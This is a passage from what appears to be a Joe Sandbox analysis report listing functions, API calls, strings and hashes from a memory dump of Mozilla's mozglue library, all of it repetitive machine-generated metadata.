                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE7DC), ref: 6C977CD2
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C977DAF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeavememset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 759993129-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d22126c70770079dcdd4827d100e457dbbc1381ddc09a68813016c204bcb4de8
                                                                                                                                                                                                                                                                                        • Instruction ID: ba170a5d3daaf6b335d6b3da00ff7b02fed92d99bee23564c8c0ce7ba07f244f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d22126c70770079dcdd4827d100e457dbbc1381ddc09a68813016c204bcb4de8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B027471A0521ACFDB65CF19C584799B7B5FF98314F2942AAD809A7701D730ED90CF90
                                                                                                                                                                                                                                                                                        Function 6C9C5FF0 Relevance: 15.1, APIs: 10, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 6C9C6009
                                                                                                                                                                                                                                                                                        • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C9C6024
                                                                                                                                                                                                                                                                                        • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6C96EE51,?), ref: 6C9C6046
                                                                                                                                                                                                                                                                                        • OutputDebugStringA.KERNEL32(?,6C96EE51,?), ref: 6C9C6061
                                                                                                                                                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9C6069
                                                                                                                                                                                                                                                                                        • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C9C6073
                                                                                                                                                                                                                                                                                        • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C9C6082
                                                                                                                                                                                                                                                                                        • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C9E148E), ref: 6C9C6091
                                                                                                                                                                                                                                                                                        • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6C96EE51,00000000,?), ref: 6C9C60BA
                                                                                                                                                                                                                                                                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C9C60C4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3835517998-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ea0b68077fa64ffd76dcc47ef03e6f4f69b179985f30176288c68950faa8d9a7
                                                                                                                                                                                                                                                                                        • Instruction ID: d92c8d129c0a24130f979a2f763636445208d064b71910aab2c04378a409b6b7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea0b68077fa64ffd76dcc47ef03e6f4f69b179985f30176288c68950faa8d9a7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF21E771A003089FDF10AF25DC09BAE7BB8FF59214F108428E85AA7241CB35E558CFD6
                                                                                                                                                                                                                                                                                        Function 6C9C7030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 6C9C7046
                                                                                                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C9C7060
                                                                                                                                                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9C707E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9781B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C9781DE
                                                                                                                                                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9C7096
                                                                                                                                                                                                                                                                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C9C709C
                                                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 6C9C70AA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                                                                                                                                                                                                                                        • String ID: ### ERROR: %s: %s$(null)
                                                                                                                                                                                                                                                                                        • API String ID: 2989430195-1695379354
                                                                                                                                                                                                                                                                                        • Opcode ID: 799d50ae2c8cd4392b7396ed99514a563573442b8f12c1fd3b3a1d9ce1cbd790
                                                                                                                                                                                                                                                                                        • Instruction ID: 50fe69005c182e798a9f15668ccba81107089ea7272f5e11be6f008f9f28ce09
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 799d50ae2c8cd4392b7396ed99514a563573442b8f12c1fd3b3a1d9ce1cbd790
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B001F9B1A00204AFDB40ABA4DC0ADAF7BBCEF5D215F110438FA05A3241E631A9148BE5
                                                                                                                                                                                                                                                                                        Function 6C989E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C989EB8
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C989F24
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C989F34
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C98A823
                                                                                                                                                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C98A83C
                                                                                                                                                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C98A849
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
                                                                                                                                                                                                                                                                                        • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                        • API String ID: 2950001534-1351931279
                                                                                                                                                                                                                                                                                        • Opcode ID: cde5646b796971ff5ae54760adf51a12e01acdd0eb05b015ade1a5c8bd69a31b
                                                                                                                                                                                                                                                                                        • Instruction ID: 5fbc5079064593bcb9c93d3442eddf73db190925f6fb4ff7465c25f263bc933a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cde5646b796971ff5ae54760adf51a12e01acdd0eb05b015ade1a5c8bd69a31b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D728D72A067118FD714CF28C540215FBE5BF89328F2ACAADE8699B7D1D735E841CB80
                                                                                                                                                                                                                                                                                        Function 6C9B2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C9B2C31
                                                                                                                                                                                                                                                                                        • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C9B2C61
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C964DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C964E5A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C964DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C964E97
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9B2C82
                                                                                                                                                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9B2E2D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9781B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C9781DE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                                                                                                                                        • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                                                                                                                                        • API String ID: 801438305-4149320968
                                                                                                                                                                                                                                                                                        • Opcode ID: 051c9d082c5821644c26f3b8e480c488fc55b8b01ee6521ea9ca19aa7f22a088
                                                                                                                                                                                                                                                                                        • Instruction ID: 0e82305e77267a25958e945baa88ae0951f10a098b746c708860881212eb99dd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 051c9d082c5821644c26f3b8e480c488fc55b8b01ee6521ea9ca19aa7f22a088
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4791BFB0608B40AFC724CF24C49469FB7E5EFD9358F10891DE59AAB750DB30E949CB52
                                                                                                                                                                                                                                                                                        Function 6C98C0E0 Relevance: 11.2, APIs: 4, Strings: 2, Instructions: 728COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 0123456789abcdef$MOZ_CRASH()
                                                                                                                                                                                                                                                                                        • API String ID: 0-3968268099
                                                                                                                                                                                                                                                                                        • Opcode ID: a0559201fb54e4bb5dbdf6e5a296bf40641f38dc39e42f3d8cfade126cc7b4d0
                                                                                                                                                                                                                                                                                        • Instruction ID: d6823aab76d6d217b7a1c47d9074fd7f92bfa692dc26a7ff4b3ebf7128c90589
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0559201fb54e4bb5dbdf6e5a296bf40641f38dc39e42f3d8cfade126cc7b4d0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E552C13160A3428FD724CF28C49076AB7E6FF8A318F248E1ED99687B95D735D845CB42
                                                                                                                                                                                                                                                                                        Function 6C9C9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __aulldiv__aullrem
                                                                                                                                                                                                                                                                                        • String ID: -Infinity$NaN
                                                                                                                                                                                                                                                                                        • API String ID: 3839614884-2141177498
                                                                                                                                                                                                                                                                                        • Opcode ID: 1878906bbb34f85a380a7cb9515025233fd6f2394b67ad10b68b7a7e09835e22
                                                                                                                                                                                                                                                                                        • Instruction ID: 2d046e7d8ccc60130126665580cd21b528b909adca834dcfbe03bef720b97a9b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1878906bbb34f85a380a7cb9515025233fd6f2394b67ad10b68b7a7e09835e22
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22C1BF31F04319CBDB14CFA8C8507AEB7B6AB95318F144529D406ABB80DB71ED49CB92
                                                                                                                                                                                                                                                                                        Function 6C96D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: $-$0$0$1$8$9$@
                                                                                                                                                                                                                                                                                        • API String ID: 0-3654031807
                                                                                                                                                                                                                                                                                        • Opcode ID: d422a437f902954c7f4d47f26aa9593decdb02c354d74d2faeb5604f4aa8a01f
                                                                                                                                                                                                                                                                                        • Instruction ID: a0901f222cd8859a407b961e5c55f7510dac1a46e8bb02b0adb94351604edb07
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d422a437f902954c7f4d47f26aa9593decdb02c354d74d2faeb5604f4aa8a01f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3362BC7250D3458FE701CE2AC09076ABBE6AF86358F284A4DE4E54BFD5C335D985CB82
                                                                                                                                                                                                                                                                                        Function 6C979F00 Relevance: 8.5, Strings: 6, Instructions: 1039COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: ' $0$0$1$9$@
                                                                                                                                                                                                                                                                                        • API String ID: 0-2946122015
                                                                                                                                                                                                                                                                                        • Opcode ID: d76fcf7af0b8365144aa1527f566321c4b1d1706847f2973b619ef0bd7ac3535
                                                                                                                                                                                                                                                                                        • Instruction ID: a1be253c2caa14fe329c049bd74b65482e8243ccad3493cbe9aed38c26178273
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d76fcf7af0b8365144aa1527f566321c4b1d1706847f2973b619ef0bd7ac3535
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB82E13190B3118BD730CF19C48426EB7F6FB81718F55A92AE89547E90DB35E885CBA2
                                                                                                                                                                                                                                                                                        Function 6C96BEF0 Relevance: 8.2, APIs: 5, Instructions: 652COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __aulldiv$__aullrem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2022606265-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                                                                                                                                                                                                                                        • Instruction ID: 2198b8d92d22e8dc58fa359ef4a537a2fc8e157b52ebe8a950d52e9ade9fa540
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51323832B046018FDB18DE2DC890666BBE6AFD9310F09866DE895CB7D5D730DD05CB91
                                                                                                                                                                                                                                                                                        Function 6C9D545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C9D8A4B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                                        • Instruction ID: cc7a2ef15a71ddddc90dd85fe83ebbcea8de06ce68a6e7893d1ff32e00509b1a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10B1E772E0061A8FDB14CF68CC907A9B7B6EF95314F1A42A9C549EB781D730E985CB90
                                                                                                                                                                                                                                                                                        Function 6C9D542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C9D88F0
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C9D925C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                                        • Instruction ID: 5500b97effd87f839a53f5ec3485a5758551096bee4b98d62caf4844f2ae5e49
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CB1E572E0061A8FCB14CF58CC906ADB7B6EF95314F1A42A9C549EB785D730E989CB90
                                                                                                                                                                                                                                                                                        Function 6C9D50C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9D8E18
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C9D925C
